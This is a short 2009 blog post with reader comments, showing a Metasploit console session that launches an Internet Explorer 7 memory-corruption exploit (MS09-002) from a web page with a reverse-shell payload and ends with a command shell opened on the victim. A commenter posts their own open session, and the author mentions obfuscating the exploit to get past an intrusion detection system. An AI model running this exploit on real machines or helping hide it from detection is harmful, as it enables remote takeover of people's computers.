Wednesday, February 18, 2009

MS09_002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to
[*] Command shell session 1 opened ( ->
dean de beer


Anonymous said...

Hmmmm... sounds great !! Can't wait for the juicy details ;)

Anonymous said...

install linux problem solved

Anonymous said...

got mine!

msf exploit(ms09_002) > sessions -l -v

Active sessions

Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell -> windows/browser/ms09_002

msf exploit(ms09_002) >

..thanks for the sample malware dean!!

dean de beer said...

No worries. Happy to help. :) I just need to finish off the obfuscation of the variables in mine and it's done.

I tested it through ISS's IDS and it's catching the shellcode and nops right now and not the trigger itself although that does not seem easy to alert on.

CG said...


Anonymous said...

w00t! i didn't got mine! :(